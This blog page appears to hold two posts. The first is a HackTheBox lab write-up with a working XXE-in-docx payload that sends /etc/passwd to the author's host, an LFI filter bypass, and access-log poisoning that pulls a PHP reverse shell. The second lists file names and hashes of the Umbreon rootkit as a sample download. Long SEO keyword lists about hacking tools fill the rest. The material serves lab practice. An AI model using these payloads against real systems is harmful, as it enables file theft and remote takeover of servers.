Sunday, August 30, 2020

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc
cd doc
unzip ../sample.docx
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml
cd customXml
vim item1.xml
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>">
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx *
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>"
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3
Boom! we have a shell.

That's it for today's article see you next time.

References

Related posts


  1. Nsa Hack Tools Download
  2. Pentest Tools Kali Linux
  3. Best Pentesting Tools 2018
  4. New Hacker Tools
  5. Pentest Tools Subdomain
  6. Termux Hacking Tools 2019
  7. Hacker Security Tools
  8. Tools 4 Hack
  9. Growth Hacker Tools
  10. Hack Tool Apk
  11. Pentest Tools Github
  12. Hacking Tools For Windows 7
  13. Pentest Tools Open Source
  14. Pentest Automation Tools
  15. Pentest Tools Open Source
  16. Hacker Tools Windows
  17. Hacking Tools For Mac
  18. How To Hack
  19. Hacking Tools Download
  20. Hacking App
  21. Pentest Tools Free
  22. Bluetooth Hacking Tools Kali
  23. Hack App
  24. How To Install Pentest Tools In Ubuntu
  25. Hacking Tools 2020
  26. Hack Apps
  27. Hack Tools
  28. Hacking Tools For Kali Linux
  29. Hacker Techniques Tools And Incident Handling
  30. Install Pentest Tools Ubuntu
  31. Hacking Tools Windows 10
  32. Hack Tools For Mac
  33. Hack Website Online Tool
  34. Pentest Tools Port Scanner
  35. How To Install Pentest Tools In Ubuntu
  36. Hacker Tools For Mac
  37. Hacker Tools Apk
  38. Hack Tools For Games
  39. Hacker Tools Apk Download
  40. World No 1 Hacker Software
  41. Pentest Tools Kali Linux
  42. Termux Hacking Tools 2019
  43. Pentest Tools Review
  44. Hack Tool Apk
  45. Pentest Tools For Android
  46. Hacker Tools Software
  47. Tools Used For Hacking
  48. Best Hacking Tools 2019
  49. How To Make Hacking Tools
  50. Pentest Tools Windows
  51. Hack Tools For Games
  52. Hacking Tools Name
  53. New Hack Tools
  54. Hacking Tools Name
  55. Hack Tools Mac
  56. Computer Hacker
  57. Pentest Tools Website
  58. Pentest Tools Free
  59. Hacking Tools Hardware
  60. What Are Hacking Tools
  61. Bluetooth Hacking Tools Kali
  62. Install Pentest Tools Ubuntu
  63. Hacking Tools Windows 10
  64. Hack Tools
  65. Pentest Recon Tools
  66. Hacker Tools Apk
  67. Pentest Tools For Mac
  68. Hack Tool Apk
  69. Pentest Tools Website Vulnerability
  70. How To Install Pentest Tools In Ubuntu
  71. Hacks And Tools
  72. Tools 4 Hack
  73. Hacker Tools Software
  74. Pentest Tools Bluekeep
  75. Pentest Tools Apk
  76. Android Hack Tools Github
  77. Hacker Tools Software
  78. Hacker Tool Kit
  79. Hacker Techniques Tools And Incident Handling
  80. Pentest Tools For Windows
  81. Pentest Tools For Mac
  82. Nsa Hack Tools
  83. Hacking Tools For Games
  84. How To Hack
  85. Pentest Tools For Ubuntu
  86. Hack Tools Download
  87. Hacking Tools Online
  88. Tools 4 Hack
  89. Hacking Tools Online
  90. Hacker Tools For Ios
  91. Hack App
  92. Hacker Tools Linux
  93. Hak5 Tools
  94. Pentest Tools Framework
  95. Hacking Tools For Beginners
  96. Pentest Tools Bluekeep
  97. Hacker Tools For Pc
  98. Hack Tools 2019
  99. Kik Hack Tools
  100. Hacker Tools Free
  101. Top Pentest Tools
  102. World No 1 Hacker Software
  103. Wifi Hacker Tools For Windows
  104. Hack Tools Pc
  105. Hacker Tools For Pc
  106. Hacking Tools For Pc
  107. Hacker Tool Kit
  108. Pentest Tools Windows
  109. Github Hacking Tools
  110. Hacker Tools Online
  111. Usb Pentest Tools
  112. Pentest Box Tools Download
  113. Hacker Tools Linux
  114. Hacks And Tools
  115. Hacker Tools For Pc
  116. Hacker Tools For Ios
  117. Pentest Tools For Android
  118. New Hack Tools
  119. Hack Tool Apk No Root
  120. What Is Hacking Tools
  121. Easy Hack Tools
  122. Hackrf Tools
  123. Tools For Hacker
  124. Hacker Tools Online
  125. Pentest Tools Tcp Port Scanner
  126. Hacking Tools Hardware
  127. Hacker Tools Hardware
  128. Hacker Tools Linux
  129. Hacker Tools Free
  130. Hacking Tools For Kali Linux
  131. Pentest Tools For Windows
  132. Hack Tools 2019
  133. Hack Tools Pc
  134. Hacker Tools Apk Download
  135. Hacking Tools Windows
  136. Tools Used For Hacking
  137. Kik Hack Tools
  138. Hacker Tools Apk
  139. Hacker Tools Linux
  140. Free Pentest Tools For Windows
  141. Hacker Tools

Saturday, August 29, 2020

Rootkit Umbreon / Umreon - X86, ARM Samples



Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
Research: Trend Micro


There are two packages
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)






Download

Download Email me if you need the password  



File information

Part one (full package)

#File NameHash ValueFile Size (on Disk)Duplicate?
1.umbreon-ascii0B880E0F447CD5B6A8D295EFE40AFA376085 bytes (5.94 KiB)
2autoroot1C5FAEEC3D8C50FAC589CD0ADD0765C7281 bytes (281 bytes)
3CHANGELOGA1502129706BA19667F128B44D19DC3C11 bytes (11 bytes)
4cli.shC846143BDA087783B3DC6C244C2707DC5682 bytes (5.55 KiB)
5hideportsD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)Yes, of file promptlog
6install.sh9DE30162E7A8F0279E19C2C30280FFF85634 bytes (5.5 KiB)
7Makefile0F5B1E70ADC867DD3A22CA62644007E5797 bytes (797 bytes)
8portchecker006D162A0D0AA294C85214963A3D3145113 bytes (113 bytes)
9promptlogD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)
10readlink.c42FC7D7E2F9147AB3C18B0C4316AD3D81357 bytes (1.33 KiB)
11ReadMe.txtB7172B364BF5FB8B5C30FF528F6C51252244 bytes (2.19 KiB)
12setup694FFF4D2623CA7BB8270F5124493F37332 bytes (332 bytes)
13spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)Yes, of file spytty.sh
14umbreon.c91706EF9717176DBB59A0F77FE95241C1007 bytes (1007 bytes)
15access.c7C0A86A27B322E63C3C29121788998B8713 bytes (713 bytes)
16audit.cA2B2812C80C93C9375BFB0D7BFCEFD5B1434 bytes (1.4 KiB)
17chown.cFF9B679C7AB3F57CFBBB852A13A350B22870 bytes (2.8 KiB)
18config.h980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)
19config.h.dist980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)Yes, of file config.h
20dirs.c46B20CC7DA2BDB9ECE65E36A4F987ABC3639 bytes (3.55 KiB)
21dlsym.c796DA079CC7E4BD7F6293136604DC07B4088 bytes (3.99 KiB)
22exec.c1935ED453FB83A0A538224AFAAC71B214033 bytes (3.94 KiB)
23getpath.h588603EF387EB617668B00EAFDAEA393183 bytes (183 bytes)
24getprocname.hF5781A9E267ED849FD4D2F5F3DFB8077805 bytes (805 bytes)
25includes.hF4797AE4B2D5B3B252E0456020F58E59629 bytes (629 bytes)
26kill.cC4BD132FC2FFBC84EA5103ABE6DC023D555 bytes (555 bytes)
27links.c898D73E1AC14DE657316F084AADA58A02274 bytes (2.22 KiB)
28local-door.c76FC3E9E2758BAF48E1E9B442DB98BF8501 bytes (501 bytes)
29lpcap.hEA6822B23FE02041BE506ED1A182E5CB1690 bytes (1.65 KiB)
30maps.c9BCD90BEA8D9F9F6270CF2017F9974E21100 bytes (1.07 KiB)
31misc.h1F9FCC5D84633931CDD77B32DB1D50D02728 bytes (2.66 KiB)
32netstat.c00CF3F7E7EA92E7A954282021DD72DC41113 bytes (1.09 KiB)
33open.cF7EE88A523AD2477FF8EC17C9DCD7C028594 bytes (8.39 KiB)
34pam.c7A947FDC0264947B2D293E1F4D69684A2010 bytes (1.96 KiB)
35pam_private.h2C60F925842CEB42FFD639E7C763C7B012480 bytes (12.19 KiB)
36pam_vprompt.c017FB0F736A0BC65431A25E1A9D393FE3826 bytes (3.74 KiB)
37passwd.cA0D183BBE86D05E3782B5B24E2C964132364 bytes (2.31 KiB)
38pcap.cFF911CA192B111BD0D9368AFACA03C461295 bytes (1.26 KiB)
39procstat.c7B14E97649CD767C256D4CD6E4F8D452398 bytes (398 bytes)
40procstatus.c72ED74C03F4FAB0C1B801687BE200F063303 bytes (3.23 KiB)
41readwrite.cC068ED372DEAF8E87D0133EAC0A274A82710 bytes (2.65 KiB)
42rename.cC36BE9C01FEADE2EF4D5EA03BD2B3C05535 bytes (535 bytes)
43setgid.c5C023259F2C244193BDA394E2C0B8313667 bytes (667 bytes)
44sha256.h003D805D919B4EC621B800C6C239BAE0545 bytes (545 bytes)
45socket.c348AEF06AFA259BFC4E943715DB5A00B579 bytes (579 bytes)
46stat.cE510EE1F78BD349E02F47A7EB001B0E37627 bytes (7.45 KiB)
47syslog.c7CD3273E09A6C08451DD598A0F18B5701497 bytes (1.46 KiB)
48umbreon.hF76CAC6D564DEACFC6319FA167375BA54316 bytes (4.21 KiB)
49unhide-funcs.c1A9F62B04319DA84EF71A1B091434C644729 bytes (4.62 KiB)
50cryptpass.py2EA92D6EC59D85474ED7A91C8518E7EC192 bytes (192 bytes)
51environment.sh70F467FE218E128258D7356B7CE328F11086 bytes (1.06 KiB)
52espeon-connect.shA574C885C450FCA048E79AD6937FED2E247 bytes (247 bytes)
53espeon-shell9EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
54espeon.c499FF5CF81C2624B0C3B0B7E9C6D980D14899 bytes (14.55 KiB)
55listen.sh69DA525AEA227BE9E4B8D59ACFF4D717209 bytes (209 bytes)
56spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
57ssh-hidden.shAE54F343FE974302F0D31776B72D0987127 bytes (127 bytes)
58unfuck.c457B6E90C7FA42A7C46D464FBF1D68E2384 bytes (384 bytes)
59unhide-self.pyB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
60listen.shF5BD197F34E3D0BD8EA28B182CCE7270233 bytes (233 bytes)

part 2 (those listed in the Trend Micro article)
#File NameHash ValueFile Size (on Disk)
1015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28acA47E38464754289C0F4A55ED7BB556489375 bytes (9.16 KiB)
20751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53aF9BA2429EAE5471ACDE820102C5B81597512 bytes (7.34 KiB)
30a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
40ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ffB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
5122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e86709EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
6409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64aB4746BB5E697F23A5842ABCAED36C9146149 bytes (6 KiB)
74fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234D0D97899131C29B3EC9AE89A6D49A23E65160 bytes (63.63 KiB)
88752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784E7E82D29DFB1FC484ED277C70218781855564 bytes (54.26 KiB)
9991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b730885222B1863ACDC0068ED5D50590CF792DF057664 bytes (7.48 KiB)
10a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddfA977F68C59040E40A822C384D1CEDEB6176 bytes (176 bytes)
11aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809bDF320ED7EE6CCF9F979AEFE451877FFC26 bytes (26 bytes)
12acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa452584D552B5D22E40BDA23E6587B1BC532D6852 bytes (6.69 KiB)
13c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480087DD79515D37F7ADA78FF5793A42B7B11184 bytes (10.92 KiB)
14e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853BBEB18C0C3E038747C78FCAB3E0444E371940 bytes (70.25 KiB)

More information


  1. Pentest Tools For Mac
  2. Pentest Tools Framework
  3. Hacking Tools Mac
  4. Pentest Tools Free
  5. Hack And Tools
  6. Pentest Automation Tools
  7. Hacking Tools Mac
  8. Free Pentest Tools For Windows
  9. Hacker Tools Hardware
  10. Pentest Tools Alternative
  11. Hacker Tools 2020
  12. Pentest Tools Bluekeep
  13. Hacker Tools
  14. Free Pentest Tools For Windows
  15. Best Pentesting Tools 2018
  16. Pentest Tools Android
  17. Usb Pentest Tools
  18. Hack Tool Apk
  19. Hacker Security Tools
  20. Hacking Tools 2020
  21. Hacking Tools For Windows 7
  22. Pentest Tools Open Source
  23. Hack Apps
  24. Hack Tools For Windows
  25. Hack Apps
  26. Best Hacking Tools 2019
  27. Hacker Search Tools
  28. Hacking Tools For Windows Free Download
  29. Hack Tools For Mac
  30. Hacking Tools Software
  31. Wifi Hacker Tools For Windows
  32. Hacking Tools For Kali Linux
  33. Kik Hack Tools
  34. Hack Tools Download
  35. Wifi Hacker Tools For Windows
  36. Hacker Tools Software
  37. Physical Pentest Tools
  38. Nsa Hack Tools Download
  39. Hacker Tools For Pc
  40. Pentest Tools Kali Linux
  41. Hacking Tools Pc
  42. Hacker Tools List
  43. Hacker Tools Apk Download
  44. Hak5 Tools
  45. Pentest Tools Nmap
  46. Hack Tools For Ubuntu
  47. Install Pentest Tools Ubuntu
  48. Hacker Tools 2020
  49. Hack Tools Download
  50. Hacking Tools For Mac
  51. Hacker Tools For Ios
  52. Hacking Tools Hardware
  53. Ethical Hacker Tools
  54. Black Hat Hacker Tools
  55. Hack Rom Tools
  56. Pentest Tools Github
  57. Hacker Tools Windows
  58. Pentest Tools Open Source
  59. Pentest Tools Windows
  60. Hack Tool Apk No Root
  61. Pentest Tools Windows
  62. Hacker
  63. Hack Tool Apk
  64. New Hack Tools
  65. Hack Tools 2019
  66. Hack Tool Apk
  67. Nsa Hack Tools
  68. Hack Tools
  69. Hacking Apps
  70. Hacking Tools Mac
  71. New Hacker Tools
  72. Hacking Tools For Kali Linux
  73. Easy Hack Tools
  74. Pentest Tools Download
  75. Hacker Tools Software
  76. Hacking Tools Pc
  77. Hacker Tools Free
  78. Hack Tools For Pc
  79. Pentest Tools For Ubuntu
  80. New Hack Tools
  81. Pentest Tools Android
  82. Underground Hacker Sites
  83. Kik Hack Tools
  84. Pentest Tools For Mac
  85. Hack Tools
  86. Pentest Tools For Ubuntu
  87. Hacking Tools For Windows Free Download
  88. Hack App
  89. Hack Tools For Mac
  90. Pentest Tools For Mac
  91. Pentest Tools Nmap
  92. Beginner Hacker Tools
  93. Hacking Tools For Games
  94. Wifi Hacker Tools For Windows
  95. Hack Tools 2019
  96. Pentest Box Tools Download
  97. Hacker Tools 2020
  98. Tools 4 Hack
  99. Hacker Tools For Windows
  100. Hacker Tools Linux
  101. New Hacker Tools
  102. Hacking App
  103. Hacker Tools For Mac
  104. Hack Tools For Ubuntu
  105. Hacking Tools For Mac
  106. Top Pentest Tools
  107. Hack Tools Download
  108. Hacker Tools Hardware
  109. Hacking Tools For Windows Free Download
  110. Beginner Hacker Tools
  111. Hacker Tools Free Download
  112. Pentest Tools List
  113. Hacker Tools Hardware
  114. Hack Tools For Ubuntu
  115. Pentest Tools For Android
  116. Hack Tools For Pc
  117. Pentest Tools Url Fuzzer
  118. Pentest Tools Github
  119. Pentest Tools For Mac
  120. Hacker Tools Free Download
  121. Hacker Tools 2020
  122. Pentest Automation Tools
  123. Pentest Tools
  124. Hak5 Tools
  125. Hacker Tools Github
  126. Blackhat Hacker Tools
  127. Pentest Tools Url Fuzzer
  128. Pentest Automation Tools
  129. Pentest Tools Linux
  130. Hacking Tools Software
  131. Pentest Tools Free
  132. Hack Tools Github